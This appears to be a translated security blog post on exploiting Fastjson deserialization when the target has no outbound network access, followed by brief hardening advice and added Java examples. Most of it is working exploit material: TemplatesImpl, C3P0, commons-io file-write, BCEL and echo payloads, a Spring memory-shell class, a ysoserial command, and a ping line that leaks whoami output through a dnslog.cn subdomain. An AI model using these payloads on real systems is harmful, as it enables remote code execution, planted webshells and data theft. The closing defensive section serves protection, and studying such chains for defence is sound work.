Fastjson Exploitation Without Outbound Network Access: A Summary
Word count: 1115 | 2025-08-25 22:59:09
1. Fastjson basics
Fastjson is Alibaba's open-source JSON parsing library; its main job is serialization and deserialization:
// Serialization
String text = JSON.toJSONString(obj);
// Deserialization
Object ob = JSON.parse(text); // parsed into a JSONObject or JSONArray
Object ob1 = JSON.parseObject("{...}"); // parsed into a JSONObject
Object ob2 = JSON.parseObject("{...}", VO.class); // parsed into the given class
2. How the POC evolved
2.1 Basic User class
public class User {
private String name;
private int age;
// constructor, getters/setters, etc.
}
2.2 Serialization and deserialization behaviour
- Without @type: neither the constructor nor the setters are invoked.
- With @type: parse() calls the constructor and the setters for the keys present; parseObject() additionally calls the getters.
2.3 Key observation
Serializing with SerializerFeature.WriteClassName adds the @type field to the output:
String serializedStr1 = JSON.toJSONString(user, SerializerFeature.WriteClassName);
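To make the behaviour described in 2.2 and 2.3 observable, here is an added example (not from the original post) in which every hook on a User bean prints its name, and the three parse paths are run in turn. It assumes Fastjson 1.2.24 on the classpath, as in section 3.1; from 1.2.25 onward the @type here is rejected unless the class is allow-listed, which is exactly the mitigation in section 4.

```java
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.serializer.SerializerFeature;

// Added demo bean (hypothetical): every hook prints its name so the call order is visible.
public class User {
    private String name;
    private int age;

    public User() { System.out.println("[User] constructor"); }
    public String getName() { System.out.println("[User] getName"); return name; }
    public void setName(String name) { System.out.println("[User] setName"); this.name = name; }
    public int getAge() { System.out.println("[User] getAge"); return age; }
    public void setAge(int age) { System.out.println("[User] setAge"); this.age = age; }

    public static void main(String[] args) {
        User u = new User();
        u.setName("alice");
        u.setAge(30);

        // SerializerFeature.WriteClassName embeds "@type":"User" in the JSON (section 2.3).
        // Serialization itself reads the bean through its getters, so they print here too.
        String typed = JSON.toJSONString(u, SerializerFeature.WriteClassName);
        System.out.println(typed);

        // 1) No @type: the result is a plain JSONObject; User's constructor and setters never run.
        System.out.println("-- parse() without @type --");
        JSON.parse("{\"name\":\"alice\",\"age\":30}");

        // 2) @type + parse(): Fastjson instantiates User and calls the setters for the keys present.
        System.out.println("-- parse() with @type --");
        JSON.parse(typed);

        // 3) @type + parseObject(): as above, then the bean is converted back into a
        //    JSONObject, which additionally invokes every getter.
        System.out.println("-- parseObject() with @type --");
        JSON.parseObject(typed);
    }
}
```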
3. Fastjson exploitation techniques without outbound network access
3.1 TemplatesImpl gadget chain
Applicable version: 1.2.24
Preconditions:
- When using parseObject(): JSON.parseObject(input, Object.class, Feature.SupportNonPublicField)
- When using parse(): JSON.parse(text1, Feature.SupportNonPublicField)
Steps:
- Create the malicious class:
public class Shell extends AbstractTranslet {
public static void main(String[] args) {
try {
Runtime.getRuntime().exec("open -a calculator");
} catch (IOException e) {
e.printStackTrace();
}
}
// abstract methods that must be implemented
}
- Compile the malicious class and Base64-encode it
- Build the payload:
{
"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
"_bytecodes":["MALICIOUS_CLASS_BASE64"],
"_name":"a.b",
"_tfactory":{},
"_outputProperties":{},
"_version":"1.0",
"allowedProtocols":"all"
}
3.2 Echo techniques
3.2.1 DNSLOG exfiltration
Runtime.getRuntime().exec("ping `whoami`.xxxxxx.dnslog.cn");
3.2.2 Writing to a static resource
Runtime.getRuntime().exec("whoami >> /path/to/static/js/consoleinfo.js");
3.3 TemplatesImpl memory shell
Spring framework memory shell example:
public class TemplatesImplSpringController extends AbstractTranslet {
public TemplatesImplSpringController() throws Exception {
// register the malicious Controller
WebApplicationContext context = (WebApplicationContext) RequestContextHolder
.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
// register the mapping, etc.
}
public void test() throws Exception {
// command execution logic
HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
String arg0 = request.getParameter("cmd");
// execute the command and echo the output
}
}
3.4 C3P0 second-stage deserialization
Required dependencies:
- commons-collections4 4.0
- c3p0 0.9.5.2
Steps:
- Generate the serialized payload:
java -jar ysoserial-all.jar CommonsCollections2 "open -a Calculator" > calc.ser
- Convert the payload to a hex string
- Build the payload:
{
"e":{
"@type":"java.lang.Class",
"val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
},
"f":{
"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
"userOverridesAsString":"HexAsciiSerializedMap:HEX_STRING;"
}
}
3.5 Commons-io file write / webshell
Applicable version: Fastjson < 1.2.68
3.5.1 Original POC for JRE 8
{
"x":{
"@type":"java.lang.AutoCloseable",
"@type":"sun.rmi.server.MarshalOutputStream",
"out":{
"@type":"java.util.zip.InflaterOutputStream",
"out":{
"@type":"java.io.FileOutputStream",
"file":"/tmp/dest.txt",
"append":false
},
"infl":{
"input":"BASE64_DATA"
},
"bufLen":1048576
},
"protocolVersion":1
}
}
3.5.2 Commons-io 2.0 to 2.6
{
"x":{
"@type":"com.alibaba.fastjson.JSONObject",
"input":{
"@type":"java.lang.AutoCloseable",
"@type":"org.apache.commons.io.input.ReaderInputStream",
"reader":{
"@type":"org.apache.commons.io.input.CharSequenceReader",
"charSequence":{"@type":"java.lang.String""LONG_STRING(>8192)"
},
"charsetName":"UTF-8",
"bufferSize":1024
},
"branch":{
"@type":"java.lang.AutoCloseable",
"@type":"org.apache.commons.io.output.WriterOutputStream",
"writer":{
"@type":"org.apache.commons.io.output.FileWriterWithEncoding",
"file":"/tmp/pwned",
"encoding":"UTF-8",
"append": false
},
"charsetName":"UTF-8",
"bufferSize": 1024,
"writeImmediately": true
},
// trigger logic...
}
}
3.6 BCEL attack (command execution / memory shell)
Steps:
- Compile the malicious class and convert it to BCEL format
- Build the payload:
{
"x":{
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "$$BCEL$$$BCEL_CODE"
}
}
3.7 Echo techniques
3.7.1 SpringEcho
{
"x":{
"@type":"com.alibaba.fastjson.JSONObject",
"name":{
"@type":"java.lang.Class",
"val":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource"
},
"c":{
"@type":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource",
"key":{
"@type":"java.lang.Class",
"val":"com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassLoader":{
"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driver":"$$BCEL$$$BCEL_CODE"
}
}
}
3.7.2 Tomcat echo
{
"a": {
"@type": "java.lang.Class",
"val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
},
"b": {
"@type": "java.lang.Class",
"val": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"c": {
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "$$BCEL$$$BCEL_CODE"
}
}
3.7.3 iBatis echo (for WebLogic/JBoss)
{
"@type":"com.alibaba.fastjson.JSONObject",
"name":{
"@type":"java.lang.Class",
"val":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource"
},
"c":{
"@type":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource",
"key":{
"@type":"java.lang.Class",
"val":"com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassLoader":{
"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driver":"$$BCEL$$$BCEL_CODE"
}
}
4. Defensive recommendations
- Upgrade Fastjson to the latest secure version
- Disable the autoType feature
- Use the safeMode configuration
- Strictly filter and validate JSON input
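An added example (not from the original post) of the configuration the last three points describe: it turns on Fastjson's safeMode, shows the alternative of keeping autoType off with an allow-list for the application's own beans, and checks that a @type probe built from the TemplatesImpl class name in section 3.1 is now rejected. It assumes Fastjson 1.2.68 or later on the classpath; the package prefix com.example.model is an assumption.

```java
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.ParserConfig;

public class FastjsonHardening {
    // Constructed probe: only the @type header of the section 3.1 payload, no bytecode.
    static final String TYPED_PROBE =
        "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_name\":\"a.b\"}";

    // Strongest option (1.2.68+): safeMode ignores @type completely, including allow-listed
    // classes. Same effect as -Dfastjson.parser.safeMode=true on the JVM command line.
    static void enableSafeMode() {
        ParserConfig.getGlobalInstance().setSafeMode(true);
    }

    // If the application genuinely needs @type for its own DTOs, keep autoType off (the
    // default since 1.2.25) and allow-list only the application's package (assumed prefix).
    static void allowListOnly() {
        ParserConfig cfg = ParserConfig.getGlobalInstance();
        cfg.setAutoTypeSupport(false);
        cfg.addAccept("com.example.model.");
    }

    // Returns true when the parser refuses the typed payload, false when it accepts it.
    static boolean rejectsTypedPayload(String json) {
        try {
            JSON.parseObject(json);
            return false;
        } catch (JSONException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        allowListOnly();
        System.out.println("allow-list rejects TemplatesImpl probe: " + rejectsTypedPayload(TYPED_PROBE));
        enableSafeMode();
        System.out.println("safeMode rejects TemplatesImpl probe: " + rejectsTypedPayload(TYPED_PROBE));
    }
}
```

safeMode also closes the java.lang.AutoCloseable expected-class route used by the section 3.5 payloads, which is why the post gives 1.2.68 as the upper bound for that technique.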